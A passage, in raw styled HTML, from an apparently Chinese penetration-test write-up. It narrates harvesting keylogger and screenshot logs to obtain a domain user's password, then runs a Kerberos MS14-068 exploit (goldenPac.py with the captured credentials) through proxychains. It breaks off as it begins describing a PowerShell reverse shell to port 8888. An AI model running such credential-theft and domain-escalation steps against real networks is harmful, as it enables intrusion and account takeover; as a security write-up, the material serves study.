"Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><br/><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hbg4ulcj21co0s4u0x.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">等了几天后，我们发现在这个目录下终于有东西了，下载之后看到键盘记录：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hcocuuvj20i70e5wh0.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">屏幕截图记录：</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hcyh5wvj20vn0pa461.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">我们现在获得了一个普通域账</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">号的账户名和密码，下面试试&nbsp;MS14-068&nbsp;能不能成功，用&nbsp;proxychain&nbsp;执行：</p><div id="crayon-5c25a60d4f7f4672609029" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 599.2px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f7f4672609029-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">goldenPac</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">py</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">diattack</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">com</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">/</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">jack</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">:</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">jackpwd</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">@</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">dns</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">diattack</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">com</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">NICE!!!</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7he1w6l7j211l0hvtxm.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">Ps:&nbsp;攻击的时候如果dns在内网要记得hosts的地址绑定。</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hee9it0j20bn040wgp.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">用得到的&nbsp;shell&nbsp;反弹一个&nbsp;PoweShell&nbsp;出来到本地8888端口，如果你用下面的语句反弹的话将得到是一个32位的&nbsp;PowerShell&nbsp;：</p><div id="crayon-5c25a60d4f803816196343" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 1364.8px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; 